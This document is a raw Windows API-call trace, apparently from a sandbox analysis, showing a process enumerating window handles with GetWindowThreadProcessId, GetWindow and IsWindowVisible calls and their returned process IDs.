	[0919.744] GetWindowThreadProcessId (in: hWnd=0x108a0, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1b34
	[0919.744] GetWindowThreadProcessId (in: hWnd=0x1088e, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1b64
	[0919.744] GetWindowThreadProcessId (in: hWnd=0x1087c, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1bb0
	[0919.744] GetWindowThreadProcessId (in: hWnd=0x204f6, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1acc
	[0919.744] GetWindowThreadProcessId (in: hWnd=0x1083e, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1a2c
	[0919.744] GetWindowThreadProcessId (in: hWnd=0x2042c, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x19a8
	[0919.744] GetWindowThreadProcessId (in: hWnd=0x10836, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1944
	[0919.744] GetWindowThreadProcessId (in: hWnd=0x10826, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x18c8
	[0919.744] GetWindowThreadProcessId (in: hWnd=0x10822, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x18ac
	[0919.745] GetWindowThreadProcessId (in: hWnd=0x1081e, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x18ec
	[0919.745] GetWindowThreadProcessId (in: hWnd=0x1081a, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1898
	[0919.745] GetWindowThreadProcessId (in: hWnd=0x10810, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0xc98
	[0919.745] GetWindowThreadProcessId (in: hWnd=0x1080a, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x153c
	[0919.745] GetWindowThreadProcessId (in: hWnd=0x10806, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1808
	[0919.745] GetWindowThreadProcessId (in: hWnd=0x10790, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x12a4
	[0919.745] GetWindowThreadProcessId (in: hWnd=0x1078e, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1740
	[0919.745] GetWindowThreadProcessId (in: hWnd=0x10784, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x16c4
	[0919.746] GetWindowThreadProcessId (in: hWnd=0x107c2, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1820
	[0919.746] GetWindowThreadProcessId (in: hWnd=0x107b4, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x16ac
	[0919.746] GetWindowThreadProcessId (in: hWnd=0x1079a, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1858
	[0919.746] GetWindowThreadProcessId (in: hWnd=0x1077e, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1664
	[0919.746] GetWindowThreadProcessId (in: hWnd=0x10778, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x10b4
	[0919.746] GetWindowThreadProcessId (in: hWnd=0x10774, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x10ac
	[0919.746] GetWindowThreadProcessId (in: hWnd=0x20378, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x10ec
	[0919.746] GetWindowThreadProcessId (in: hWnd=0x10766, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1068
	[0919.747] GetWindowThreadProcessId (in: hWnd=0x10762, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x17e0
	[0919.747] GetWindowThreadProcessId (in: hWnd=0x1075e, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x102c
	[0919.747] GetWindowThreadProcessId (in: hWnd=0x1075a, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x17a4
	[0919.747] GetWindowThreadProcessId (in: hWnd=0x2035a, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1050
	[0919.747] GetWindowThreadProcessId (in: hWnd=0x1072c, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1694
	[0919.747] GetWindowThreadProcessId (in: hWnd=0x1071e, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1770
	[0919.747] GetWindowThreadProcessId (in: hWnd=0x10710, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1720
	[0919.747] GetWindowThreadProcessId (in: hWnd=0x10702, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x165c
	[0920.794] GetWindow (hWnd=0x10702, uCmd=0x4) returned 0x0
	[0920.794] IsWindowVisible (hWnd=0x10702) returned 0
	[0920.795] GetWindowThreadProcessId (in: hWnd=0x106ca, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1578
	[0920.795] GetWindowThreadProcessId (in: hWnd=0x204a6, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x16c0
	[0920.795] GetWindowThreadProcessId (in: hWnd=0x106c4, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x161c
	[0920.795] GetWindowThreadProcessId (in: hWnd=0x106c0, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1638
	[0920.795] GetWindowThreadProcessId (in: hWnd=0x20362, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x15c8
	[0920.795] GetWindowThreadProcessId (in: hWnd=0x106be, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1554
	[0920.795] GetWindowThreadProcessId (in: hWnd=0x106bc, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1674
	[0920.795] GetWindowThreadProcessId (in: hWnd=0x106b4, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1520
	[0920.796] GetWindowThreadProcessId (in: hWnd=0x1068e, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x14bc
	[0920.796] GetWindowThreadProcessId (in: hWnd=0x1067e, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0xf8c
	[0920.796] GetWindowThreadProcessId (in: hWnd=0x1066e, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0xe9c
	[0920.796] GetWindowThreadProcessId (in: hWnd=0x1065e, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1434
	[0920.796] GetWindowThreadProcessId (in: hWnd=0x1064e, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x14ec
	[0920.796] GetWindowThreadProcessId (in: hWnd=0x1063e, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0xfcc
	[0920.796] GetWindowThreadProcessId (in: hWnd=0x1062e, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x12ac
	[0920.796] GetWindowThreadProcessId (in: hWnd=0x1062a, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1484
	[0920.797] GetWindowThreadProcessId (in: hWnd=0x10626, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x934
	[0920.797] GetWindowThreadProcessId (in: hWnd=0x10622, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0xc0c
	[0920.797] GetWindowThreadProcessId (in: hWnd=0x1061c, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0xb08
	[0920.797] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x948
	[0920.797] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1178
	[0920.797] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x13e0
	[0920.797] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0xcd0
	[0920.797] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x13fc
	[0920.797] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0xdc8
	[0920.798] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0xc18
	[0920.798] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0xc2c
	[0920.798] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0xa1c
	[0920.798] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1244
	[0920.798] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0xdb0
	[0920.798] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1398
	[0920.798] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1358
	[0920.798] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1370
	[0920.799] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1340
	[0920.799] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x130c
	[0920.799] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x12c0
	[0920.799] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x12e4
	[0920.799] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1270
	[0920.799] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1298
	[0920.799] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x120c
	[0920.799] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x122c
	[0920.799] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x11c4
	[0920.800] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x11b0
	[0920.800] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1188
	[0920.800] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1148
	[0920.800] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1160
	[0920.800] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x10fc
	[0920.800] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0xe34
	[0920.800] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0xea4
	[0920.800] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x514
	[0920.801] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0xe48
	[0920.801] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0xbc8
	[0920.801] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0xdf8
	[0920.801] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x318
	[0920.801] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0xcac
	[0920.801] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x8bc
	[0920.801] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0xf9c
	[0920.801] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0xf48
	[0920.801] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0xe40
	[0920.802] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0xecc
	[0920.802] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0xeb8
	[0920.802] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0xe80
	[0920.802] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0xe98
	[0920.802] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0xe60
	[0920.802] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0xee4
	[0920.802] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0xf00
	[0920.802] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0xdf0
	[0920.803] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0xe1c
	[0920.803] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0xdd0
	[0920.803] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0xd94
	[0920.803] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0xd74
	[0920.803] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0xd00
	[0920.803] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0xcd8
	[0920.803] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0xc84
	[0920.803] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0xca4
	[0920.803] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0xc64
	[0920.804] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0xc24
	[0920.804] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0xb84
	[0920.804] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0xbac
	[0920.804] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x384
	[0920.804] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0xab8
	[0920.804] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x33c
	[0920.804] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0xa44
	[0920.804] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0xa64
	[0920.805] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x8a8
	[0920.805] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0xaf0
	[0920.805] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x88c
	[0920.805] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0xb04
	[0920.805] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x910
	[0920.805] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x230
	[0920.805] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0xac0
	[0920.805] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0xab4
	[0920.806] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0xaac
	[0920.806] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x3d0
	[0920.806] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x978
	[0920.806] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0xa7c
	[0920.806] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x59c
	[0920.806] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0xa88
	[0920.806] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0xa6c
	[0920.806] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0xa68
	[0920.806] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x9f8
	[0920.807] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0xa04
	[0920.807] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x924
	[0920.807] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x8dc
	[0920.807] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x7dc
	[0920.807] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x768
	[0920.807] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x764
	[0920.807] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x820
	[0920.807] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x810
	[0920.812] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x794
	[0920.812] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x83c
	[0920.813] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x7ac
	[0920.813] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0xb44
	[0920.813] GetWindowThreadProcessId (in: hWnd=0x108d6, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x6bc
	[0920.813] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0xb5c
	[0920.813] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x838
	[0920.813] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x4d0
	[0920.813] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x4d0
	[0920.814] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x4d0
	[0920.814] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x4d0
	[0920.814] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x4d0
	[0920.814] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x4d0
	[0920.814] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x4d0
	[0920.815] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x4d0
	[0920.815] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x818
	[0920.815] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x5b8
	[0920.816] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x494
	[0920.816] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1ec
	[0920.816] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x440
	[0920.817] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x7e8
	[0920.817] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x730
	[0920.817] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x2c8
	[0920.817] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x31c
	[0920.818] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x330
	[0920.818] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x128
	[0920.818] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x5c8
	[0920.818] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x6f8
	[0920.818] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x358
	[0920.819] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x73c
	[0920.819] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0xb0
	[0920.819] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x250
	[0920.819] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x240
	[0920.819] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x790
	[0920.819] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x61c
	[0920.820] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x540
	[0920.820] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x538
	[0920.820] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x568
	[0920.820] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x538
	[0920.820] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x568
	[0920.821] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x538
	[0920.821] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x540
	[0920.821] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x540
	[0920.821] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x57c
	[0920.821] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x460
	[0920.821] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x554
	[0920.821] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x4d0
	[0920.821] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x528
	[0920.822] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x4d0
	[0920.822] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x4d0
	[0920.822] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x4d0
	[0920.822] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x79c
	[0920.822] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x4d0
	[0920.822] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x4e0
